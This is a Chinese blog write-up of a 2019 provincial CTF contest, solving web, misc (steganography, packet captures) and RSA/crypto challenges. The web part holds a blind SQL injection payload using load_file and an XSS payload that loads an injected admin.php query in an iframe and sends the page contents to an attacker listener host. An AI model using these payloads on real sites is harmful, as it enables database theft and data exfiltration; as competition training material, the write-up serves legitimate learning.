Virtua1's blog

2019省赛初赛WP

字数统计: 1.1k阅读时长: 5 min
2019/09/23 Share

tcl。

Web

Web1

这注入。。。。

payload:1'+(select ascii(substr(load_file('/ctf/flag'),X,1)))+'2

image.png

Web2

思路:利用iframe标签 结合sql注入

开始提示不是admin 然后一直以为要用XSS打管理员cookie 然后打不到,正确的思路是利用xss直接访问 注入页面

投稿那里,是xss用iframe标签结合sql注入,得到的url,在到反馈那里提交,通过xssbot自动去访问提交的xss页面

复现环境没了 payload:

1
var iframe=document.createElement("iframe");
2
iframe.src="/admin.php?id=-999 union select 1,2,flagg from flag";
3
document.body.appendChild(iframe);
4
iframe.onload=setInterval(
5
	function(){
6
		var c=encodeURI(document.getElementsByTagName("iframe")[0].contentWindow.document.getElementsByTagName("body")[0].innerHTML);
7
		window.location.href="http://'+xssListener+'?flag="+btoa(c)
8
	}
9
,1000);

Misc

签到

公众号发送 “give me flag” 得到二维码 识别 然后base64解码得到flag。

20190923162112.png

Misc2

分析流量包过滤http,可以发现是盲注的流量,直接提取然后转化就得到flag

分析发现大小为 518 时 就是flag字符串的ascii 直接挨个提取就可以了 也比较快

20190923170439.png

20190923172013.png

Misc3

binwalk 分析图片,foremost分离得到压缩包,解压发现有密码

20190923172517.png

20190923172619.png

修改图片高度,得到压缩包密码:aptx4869

20190923172854.png

解压得到 word 文档 打开没看到flag,继续binwalk分析,发现压缩包,修改后缀解压

20190923173255.png

在文件的word document.xml 得到flag

image.png

Misc4(上午)

foremost 分离得到另一张图片,Stegsolve浏览不同色道得到二维码 扫描得到核心价值观编码

image.png

image.png

Misc5(下午)

给的提示的 Ping 命令使用的协议,Ping命令使用的的是ICMP协议 过滤ICMP协议

ping是应用层直接使用网络层 ICMP 的例子,它没有通过运输层的 TCP 或UDP

思路是直接提取 ttl 然后二进制写进zip压缩文件,工作量比较大 因此采用python

开始写入解压出来flag为乱码 测试发现第一条数据 不读取。。先写入。

1
import pyshark
2
import struct
3
4
data = ''
5
file = open('icmp.zip','wb')
6
cap = pyshark.FileCapture('./flag2.pcapng',only_summaries=True,display_filter="icmp")
7
file.write(struct.pack('B',80))
8
9
for pkt in cap:
10
	print (pkt)
11
	data = (str(pkt).split("=")[3])
12
	#print (data)
13
	file.write(struct.pack('B',int(data)))
14
file.close()

image.png

Crypto

RSA

开始环境一直不行 常规题目 有个16进制转化而已

1
n=0xEFF76062D52A7D4927DF587FBBC293CF9A622F56E854055D6A30DCF77C9B7591
2
e=0x10001
3
c=0x6cd55a2bbb49dfd2831e34b76cb5bdfad34418a4be96180b618581e9b6319f86

先把n转化为int 然后分解 n 在线分解就可以

1
n=int(0xEFF76062D52A7D4927DF587FBBC293CF9A622F56E854055D6A30DCF77C9B7591)
2
print(n)

image.png

1
p = 325593180411801742356727264127253758939
2
q = 333360321402603178263879595968004169219

然后求出d 把d转化为16进制 解rsa即可

完整脚本:

1
# -*-coding:utf-8
2
import gmpy2
3
4
n=int(0xEFF76062D52A7D4927DF587FBBC293CF9A622F56E854055D6A30DCF77C9B7591)
5
#print(n)
6
7
e=gmpy2.mpz(int(0x10001))
8
p = 325593180411801742356727264127253758939
9
q = 333360321402603178263879595968004169219
10
phi_n=(p-1)*(q-1)
11
d=hex(gmpy2.invert(e, phi_n))
12
#print(d)
13
14
N=0xEFF76062D52A7D4927DF587FBBC293CF9A622F56E854055D6A30DCF77C9B7591
15
e=0x10001
16
d=0x1fcecb90ee2e8ea2d6cd2d1ee955766009a175962525938fe578b1da54f9990d
17
c=0x6cd55a2bbb49dfd2831e34b76cb5bdfad34418a4be96180b618581e9b6319f86
18
print(hex(pow(c,d,N))[2:-1].decode('hex'))

MIX

1
(lambda __operator, __print, __g, __y: [(sys.setrecursionlimit(1000000), [[[[[(decode(cipher), None)[1] for __g['cipher'] in [('D6VNEIRAryZ8Opdbl3bOwqmBD+lmFXbcd/XSghalqYBh1FDtbJo=')]][0] for __g['decode'], decode.__name__ in [(lambda cipher: (lambda __l: [(init(), [[[(lambda __after: (__print('sorry,you dont have the auth'), 0)[1] if (__l['auth'] != 1) else __after())(lambda: (lambda __items, __after, __sentinel: __y(lambda __this: lambda: (lambda __i: [[__this() for __l['result'] in [(__operator.iadd(__l['result'], chr((s[(__l['i'] % 256)] ^ ord(__l['cipher'][__l['i']])))))]][0] for __l['i'] in [(__i)]][0] if __i is not __sentinel else __after())(next(__items, __sentinel)))())(iter(range(len(__l['cipher']))), lambda: (__print(__l['result'].encode('base64')), None)[1], [])) for __l['auth'] in [(0)]][0] for __l['cipher'] in [(__l['cipher'].decode('base64'))]][0] for __l['result'] in [('')]][0])[1] for __l['cipher'] in [(cipher)]][0])({}), 'decode')]][0] for __g['init'], init.__name__ in [(lambda : (lambda __l: [[(lambda __items, __after, __sentinel: __y(lambda __this: lambda: (lambda __i: [(s.append(__l['i']), (k.append(ord(__l['key'][(__l['i'] % len(__l['key']))])), __this())[1])[1] for __l['i'] in [(__i)]][0] if __i is not __sentinel else __after())(next(__items, __sentinel)))())(iter(range(256)), lambda: (lambda __items, __after, __sentinel: __y(lambda __this: lambda: (lambda __i: [[[[[__this() for s[__l['j']] in [(__l['tmp'])]][0] for s[__l['i']] in [(s[__l['j']])]][0] for __l['tmp'] in [(s[__l['i']])]][0] for __l['j'] in [((((__l['j'] + s[__l['i']]) + k[__l['i']]) % 256))]][0] for __l['i'] in [(__i)]][0] if __i is not __sentinel else __after())(next(__items, __sentinel)))())(iter(range(256)), lambda: None, []), []) for __l['j'] in [(0)]][0] for __l['key'] in [('aV9hbV9ub3RfZmxhZw=='.decode('base64'))]][0])({}), 'init')]][0] for __g['k'] in [([])]][0] for __g['s'] in [([])]][0])[1] for __g['sys'] in [(__import__('sys', __g, __g))]][0])(__import__('operator', level=0), __import__('__builtin__', level=0).__dict__['print'], globals(), (lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))))

函数式编程 先运行下 发现提示:sorry,you dont have the auth

脚本中寻找 找到 Auth判断:

image.png

直接将 if (__l['auth'] != 1)改为if (__l['auth'] == 1)直接运行 base64解码 得到flag

image.png

RSA(上午)

1
n= 544187306850902797629107353619267427694837163600853983242783
2
e= 39293
3
c= 439254895818320413408827022398053685867343267971712332011972
4
m=???

直接在线分解n 得到 三个因数

image.png

1
p=67724172605733871
2
q=11571390939636959887
3
x=694415063702720454699679
1
#!/usr/bin/env python3
2
# coding:utf-8
3
4
import gmpy2
5
6
e = 39293
7
p= 67724172605733871
8
q= 11571390939636959887
9
x= 694415063702720454699679
10
n = p * q * x
11
'''
12
d=gmpy2.invert(e,(p-1)*(q-1)*(x-1))
13
print (d)
14
'''
15
d = 415207173272340254768303683638195276777445388907010003792757
16
c = 439254895818320413408827022398053685867343267971712332011972
17
m=hex(pow(c,d,n))[2:].replace("L","")
18
if(len(m)%2==1):
19
    m='0'+m
20
print (m.decode('hex'))
CATALOG
  1. 1. tcl。
  2. 2. Web
    1. 2.1. Web1
    2. 2.2. Web2
  3. 3. Misc
    1. 3.1. 签到
    2. 3.2. Misc2
    3. 3.3. Misc3
    4. 3.4. Misc4(上午)
    5. 3.5. Misc5(下午)
  4. 4. Crypto
    1. 4.1. RSA
    2. 4.2. MIX
    3. 4.3. RSA(上午)